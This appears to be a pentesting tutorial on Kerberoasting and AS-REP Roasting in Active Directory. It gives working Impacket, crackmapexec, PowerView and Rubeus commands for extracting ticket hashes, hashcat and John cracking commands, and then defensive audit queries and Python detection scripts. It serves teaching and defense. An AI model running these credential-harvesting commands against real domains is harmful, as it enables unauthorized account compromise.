
Kerberoasting and AS-REP Roasting: A Practical Guide

Learn how Kerberoasting and AS-REP Roasting attacks work against Active Directory and how to defend against them.


Active Directory environments are a prime target during penetration tests, and Kerberos-based attacks are among the most reliable techniques for obtaining credentials. Kerberoasting and AS-REP Roasting are two distinct but related attacks that exploit weaknesses in how Active Directory handles authentication tickets. Understanding both is essential for AD pentesting.

How Kerberos Authentication Works

Kerberos is the default authentication protocol in Windows Active Directory. At a high level:

  1. The client requests a Ticket Granting Ticket (TGT) from the Key Distribution Center (KDC/Domain Controller)
  2. With a TGT, the client requests Service Tickets (TGS) for specific services
  3. Service tickets are encrypted with a key derived from the service account’s password (for RC4 tickets, this key is the account’s NT hash)

The vulnerability: service tickets are returned to the requesting user encrypted with the service account’s password hash — meaning any domain user can request a service ticket and attempt to crack it offline.

Kerberoasting

What It Is

Kerberoasting targets service accounts that have a Service Principal Name (SPN) registered. Any authenticated domain user can request service tickets for any SPN. The ticket is encrypted with the service account’s password hash, which you can take offline and crack.

Step 1: Find Kerberoastable Accounts

Use GetUserSPNs.py from Impacket:

python3 GetUserSPNs.py DOMAIN/username:password -dc-ip DC_IP -request

Or with crackmapexec:

crackmapexec ldap DC_IP -u username -p password --kerberoasting output.txt

From a Windows machine (PowerShell):

# PowerView
Get-DomainUser -SPN | Select-Object samaccountname, serviceprincipalname

Step 2: Request the Ticket

Impacket’s GetUserSPNs.py with -request automatically retrieves crackable hashes:

python3 GetUserSPNs.py DOMAIN/user:pass -dc-ip 10.10.10.1 -request -outputfile kerberoast_hashes.txt

Output looks like:

$krb5tgs$23$*sqlsvc$DOMAIN.LOCAL$DOMAIN/sqlsvc*$a4b3c2...

Step 3: Crack the Hash

Use hashcat with mode 13100 (RC4, most common) or 19600 (AES-128) / 19700 (AES-256):

hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt
hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule

With John the Ripper:

john --wordlist=/usr/share/wordlists/rockyou.txt kerberoast_hashes.txt

AS-REP Roasting

What It Is

AS-REP Roasting targets accounts with Kerberos pre-authentication disabled. Normally, Kerberos requires the client to prove knowledge of the password (an encrypted timestamp) before receiving a TGT. If pre-authentication is disabled, the KDC returns an AS-REP whose encrypted part is protected with a key derived from the user’s password — without the requester ever proving who they are — and that encrypted blob can be cracked offline.

Step 1: Find Vulnerable Accounts

With Impacket (no credentials needed if pre-auth is disabled):

python3 GetNPUsers.py DOMAIN/ -dc-ip DC_IP -usersfile users.txt -no-pass -format hashcat

Or with credentials to query LDAP:

python3 GetNPUsers.py DOMAIN/user:pass -dc-ip DC_IP -request -format hashcat

From Windows with PowerView:

Get-DomainUser -PreauthNotRequired | Select-Object samaccountname

Step 2: Crack the AS-REP Hash

Hashcat mode 18200:

hashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt
hashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt -r rules/best64.rule

Using Rubeus (Windows)

If you have access to a Windows machine on the domain (or have code execution), Rubeus is the go-to tool:

# Kerberoasting
.\Rubeus.exe kerberoast /outfile:hashes.txt

# AS-REP Roasting
.\Rubeus.exe asreproast /format:hashcat /outfile:asrep_hashes.txt

Defenses Against These Attacks

Kerberoasting Prevention

  • Use long, complex passwords for service accounts (25+ random characters) — makes cracking infeasible
  • Use Group Managed Service Accounts (gMSA) — passwords are 240-character random strings rotated automatically
  • Audit SPNs regularly: Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
  • Enable AES encryption for service accounts — AES tickets are harder to crack than RC4

AS-REP Roasting Prevention

  • Enable Kerberos pre-authentication on all accounts — the default; only disable if a legacy application requires it
  • Audit accounts with pre-auth disabled: Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true}
  • Use strong passwords on any accounts that must have pre-auth disabled
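The audit checks from both prevention lists, applied in Python to a constructed user export as an added example (not code from the original post). The bit values are the real ones for the AD attributes msDS-SupportedEncryptionTypes (RC4 0x4, AES128 0x8, AES256 0x10) and userAccountControl (0x400000 = do not require pre-authentication); the record layout, the gmsa flag and all account names are assumptions.

```python
"""Audit a user export for Kerberoastable and AS-REP roastable accounts.

Added example, not from the original post: the records are constructed,
and the fields stand in for the AD attributes servicePrincipalName,
msDS-SupportedEncryptionTypes and userAccountControl.
"""

# msDS-SupportedEncryptionTypes bit flags (unset/0 means RC4 for user accounts)
RC4_HMAC = 0x4
AES128_CTS = 0x8
AES256_CTS = 0x10
# userAccountControl flag "Do not require Kerberos preauthentication"
UF_DONT_REQUIRE_PREAUTH = 0x400000

# Constructed sample export (not real accounts)
USERS = [
    {"sam": "sqlsvc", "spn": ["MSSQLSvc/db01.corp.local:1433"],
     "enctypes": RC4_HMAC, "uac": 0x10200, "gmsa": False},
    {"sam": "websvc", "spn": ["HTTP/web01.corp.local"],
     "enctypes": AES128_CTS | AES256_CTS, "uac": 0x10200, "gmsa": False},
    {"sam": "gmsa-backup$", "spn": ["HOST/bk01.corp.local"],
     "enctypes": AES256_CTS, "uac": 0x200, "gmsa": True},
    {"sam": "legacyapp", "spn": [], "enctypes": 0, "uac": 0x400200, "gmsa": False},
    {"sam": "jdoe", "spn": [], "enctypes": 0, "uac": 0x200, "gmsa": False},
]


def audit(users):
    """Return (account, finding) pairs for accounts that need attention."""
    findings = []
    for u in users:
        # Kerberoastable: an SPN on an ordinary account with a human-set password.
        # gMSAs are skipped: their passwords are long, random and rotated automatically.
        if u["spn"] and not u["gmsa"]:
            if u["enctypes"] & (AES128_CTS | AES256_CTS):
                findings.append((u["sam"], "spn-aes"))
            else:
                findings.append((u["sam"], "spn-rc4-only"))
        # AS-REP roastable: pre-authentication disabled on the account
        if u["uac"] & UF_DONT_REQUIRE_PREAUTH:
            findings.append((u["sam"], "preauth-disabled"))
    return findings


if __name__ == "__main__":
    for sam, finding in audit(USERS):
        print(f"{sam:15} {finding}")
```

Accounts reported as spn-rc4-only are the first candidates for a gMSA migration or an AES-only encryption setting; preauth-disabled accounts should be justified or fixed.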

Detection

Both attacks generate detectable Event IDs on Domain Controllers:

Event ID | Description
4769     | Kerberos Service Ticket requested (watch for RC4 encryption type 0x17)
4768     | Kerberos TGT requested (AS-REP roasting generates these without pre-auth)

Alert on bulk 4769 events with RC4 encryption from a single source IP, or 4768 events for accounts with DoesNotRequirePreAuth.
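The alerting rule above, as an added Python example that is not part of the original post: it groups constructed 4769 records by source IP and flags any IP that requested RC4 (0x17) service tickets for five or more distinct service accounts, and flags 4768 records whose Pre-Authentication Type is 0 (logon without pre-authentication). The dict field names, the sample records and the threshold are assumptions.

```python
"""Flag Kerberoasting and AS-REP Roasting patterns in DC security events.

Added example, not from the original post. Records are constructed; the
fields mirror the 4769/4768 event fields (Ticket Encryption Type,
Pre-Authentication Type) but the dict layout is an assumption.
"""
from collections import defaultdict

RC4_HMAC = 0x17        # Ticket Encryption Type for RC4-HMAC
NO_PREAUTH = 0         # Pre-Authentication Type 0: logon without pre-auth
RC4_SPN_THRESHOLD = 5  # distinct RC4 service tickets from one IP before alerting

# Constructed sample events (not real logs)
EVENTS = [
    {"id": 4769, "ip": "10.10.10.50", "account": "jdoe", "service": s, "etype": 0x17}
    for s in ("sqlsvc", "websvc", "backupsvc", "reportsvc", "ctxsvc")
] + [
    # AES (0x12) ticket for a computer account: normal traffic
    {"id": 4769, "ip": "10.10.10.20", "account": "asmith", "service": "FS01$", "etype": 0x12},
    # TGT request with no pre-auth: only pre-auth-disabled accounts produce this
    {"id": 4768, "ip": "10.10.10.50", "account": "legacyapp", "preauth": 0, "etype": 0x17},
    {"id": 4768, "ip": "10.10.10.20", "account": "asmith", "preauth": 2, "etype": 0x12},
]


def detect(events, threshold=RC4_SPN_THRESHOLD):
    """Return alerts: ('asrep_roast', ip, account) or ('kerberoast', ip, [services])."""
    rc4_services = defaultdict(set)  # source IP -> service accounts requested with RC4
    alerts = []
    for e in events:
        # Machine accounts ($) have long random passwords that rotate; skip them to cut noise
        if e["id"] == 4769 and e["etype"] == RC4_HMAC and not e["service"].endswith("$"):
            rc4_services[e["ip"]].add(e["service"])
        elif e["id"] == 4768 and e.get("preauth") == NO_PREAUTH:
            alerts.append(("asrep_roast", e["ip"], e["account"]))
    for ip, services in rc4_services.items():
        if len(services) >= threshold:
            alerts.append(("kerberoast", ip, sorted(services)))
    return alerts


if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```

Tune the threshold against your own baseline: a legitimate host rarely needs RC4 tickets for many different user SPNs in one window, while a roasting run requests them all at once.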

Practice Labs

  • HackTheBox: Forest, Active, Sauna (all AD-focused machines)
  • TryHackMe: Attacktive Directory, Post-Exploitation Basics
  • GOAD (Game of Active Directory) — self-hosted vulnerable AD lab

Mastering Kerberoasting and AS-REP Roasting significantly expands your Active Directory attack surface knowledge and is tested heavily on certifications like OSCP, CRTP, and eCPTX.

#windows #pentesting #kerberoasting #active directory #kerberos